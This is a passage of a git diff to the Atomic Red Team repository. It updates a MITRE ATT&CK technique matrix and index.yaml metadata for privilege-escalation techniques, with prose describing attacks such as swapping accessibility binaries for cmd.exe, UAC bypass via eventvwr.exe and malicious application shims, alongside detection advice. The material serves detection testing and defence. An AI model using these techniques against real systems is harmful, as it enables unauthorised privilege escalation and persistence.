+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
-| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Windows Service](../../T1543.003/T1543.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
@@ -80,6 +84,7 @@
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -97,8 +102,9 @@
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 1daa1311..0bd2210f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31,24 +31,24 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T16:28:04.990Z'
created: '2020-01-24T14:13:45.936Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process use of network
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: While users may customize their ~/.bashrc and
~/.bash_profile files , there are only certain types of commands
that typically appear in these files. Monitor for abnormal commands such as
execution of unknown programs, opening network sockets, or reaching out across
the network when user profiles are loaded during the login process.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
@@ -111,14 +111,17 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:18:44.286Z'
+ modified: '2020-06-25T19:57:54.923Z'
created: '2020-01-30T13:58:14.373Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - API monitoring
+ - Process monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
@@ -127,15 +130,12 @@ privilege-escalation:
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - API monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1134:
technique:
@@ -184,15 +184,28 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:55:15.343Z'
+ modified: '2020-04-16T19:37:02.355Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_platforms:
- - Windows
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
+ - Heuristic Detection
+ - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Tom Ueltschi @c_APT_ure
+ - Travis Smith, Tripwire
+ - Robby Winchester, @robwinchester3
+ - Jared Atkinson, @jaredcatkinson
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ - API monitoring
+ - Access tokens
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: "If an adversary is using a standard command-line shell,
analysts can detect token manipulation by auditing command-line activity.
Specifically, analysts should look for use of the runas command.
@@ -214,26 +227,13 @@ privilege-escalation:
and ParentProcessID (which are also produced from ETW and other utilities
such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId
identifies the actual parent process."
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- - API monitoring
- - Access tokens
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Tom Ueltschi @c_APT_ure
- - Travis Smith, Tripwire
- - Robby Winchester, @robwinchester3
- - Jared Atkinson, @jaredcatkinson
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- - Heuristic Detection
- - Host forensic analysis
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.008:
technique:
@@ -245,8 +245,8 @@ privilege-escalation:
source_name: capec
url: https://capec.mitre.org/data/definitions/558.html
- url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
- description: 'Glyer, C., Kazanciyan, R. (2012, August 20). THE “HIKIT” ROOTKIT:
- ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.'
+ description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit:
+ Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.'
source_name: FireEye Hikit Rootkit
- url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to
@@ -256,6 +256,10 @@ privilege-escalation:
description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse.
Retrieved November 12, 2014.
source_name: Tilbury 2014
+ - source_name: Narrator Accessibility Abuse
+ url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
+ description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub'
+ URI for Fileless Persistence. Retrieved April 28, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -269,7 +273,7 @@ privilege-escalation:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
- Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
+ Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
@@ -283,29 +287,29 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:11:19.022Z'
+ modified: '2020-05-13T20:37:30.048Z'
created: '2020-01-24T14:32:40.315Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Paul Speulstra, AECOM Global Security Operations Center
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: Changes to accessibility utility binaries or binary paths
that do not correlate with known software, patch cycles, etc., are suspicious.
Command line invocation of tools capable of modifying the Registry for associated
keys are also suspicious. Utility arguments and the binaries themselves should
be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Paul Speulstra, AECOM Global Security Operations Center
+ x_mitre_platforms:
+ - Windows
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -395,13 +399,14 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T20:22:45.298Z'
created: '2020-01-24T14:47:41.795Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor DLL loads by processes, specifically looking for
DLLs that are not recognized or not normally loaded into a process. Monitor
the AppCertDLLs Registry value for modifications that do not correlate with
@@ -415,14 +420,13 @@ privilege-escalation:
but as part of a chain of behavior that could lead to other activities, such
as making network connections for Command and Control, learning details about
the environment through Discovery, and conducting Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.010:
technique:
@@ -474,13 +478,15 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T20:34:09.996Z'
created: '2020-01-24T14:52:25.589Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Secure boot disabled on systems running Windows 8 and later
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and
look for DLLs that are not recognized or not normally loaded into a process.
Monitor the AppInit_DLLs Registry values for modifications that do not correlate
@@ -495,15 +501,13 @@ privilege-escalation:
lead to other activities, such as making network connections for Command and
Control, learning details about the environment through Discovery, and conducting
Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_system_requirements:
- - Secure boot disabled on systems running Windows 8 and later
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -567,6 +571,10 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Endgame Process Injection July 2017
+ - source_name: FireEye Application Shimming
+ url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
+ description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved
+ May 4, 2020.
- url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
@@ -599,9 +607,9 @@ privilege-escalation:
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
may allow an adversary to perform several malicious acts such as elevate privileges,
- install backdoors, disable defenses like Windows Defender, etc. Shims can
- also be abused to establish persistence by continuously being invoked by affected
- programs."
+ install backdoors, disable defenses like Windows Defender, etc. (Citation:
+ FireEye Application Shimming) Shims can also be abused to establish persistence
+ by continuously being invoked by affected programs."
id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83
type: attack-pattern
kill_chain_phases:
@@ -609,14 +617,12 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:28:29.648Z'
+ modified: '2020-05-04T19:05:30.140Z'
created: '2020-01-24T14:56:24.231Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
@@ -627,10 +633,12 @@ privilege-escalation:
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Windows
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -765,12 +773,14 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-23T13:20:55.893Z'
+ modified: '2020-06-20T22:17:05.394Z'
created: '2020-01-14T01:29:43.786Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -783,12 +793,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -842,11 +850,9 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-23T22:35:13.112Z'
created: '2019-12-03T12:59:36.749Z'
- x_mitre_platforms:
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
x_mitre_detection: "Monitor scheduled task creation using command-line invocation.
Legitimate scheduled tasks may be created during installation of new software
or through system administration functions. Look for changes to tasks that
@@ -857,9 +863,11 @@ privilege-escalation:
could lead to other activities, such as network connections made for Command
and Control, learning details about the environment through Discovery, and
Lateral Movement."
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1053.002:
technique:
@@ -914,8 +922,16 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T13:43:40.776Z'
created: '2019-11-27T13:52:45.853Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -931,16 +947,8 @@ privilege-escalation:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -993,22 +1001,22 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T15:11:25.821Z'
created: '2020-01-24T14:54:42.757Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned DLLs try to load into the LSA by setting
the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1547:
technique:
@@ -1054,12 +1062,14 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T19:47:43.546Z'
+ modified: '2020-06-30T21:23:15.683Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -1078,12 +1088,10 @@ privilege-escalation:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037:
technique:
@@ -1117,22 +1125,37 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.953Z'
created: '2017-05-31T21:30:38.910Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1548.002:
technique:
+ id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
+ description: |-
+ Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
+
+ If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
+
+ Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
+
+ * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
+
+ Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
+ name: Bypass User Access Control
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1548.002
@@ -1176,28 +1199,13 @@ privilege-escalation:
description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe.
Retrieved May 25, 2017.
source_name: enigma0x3 sdclt bypass
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bypass User Access Control
- description: |-
- Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
-
- If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
-
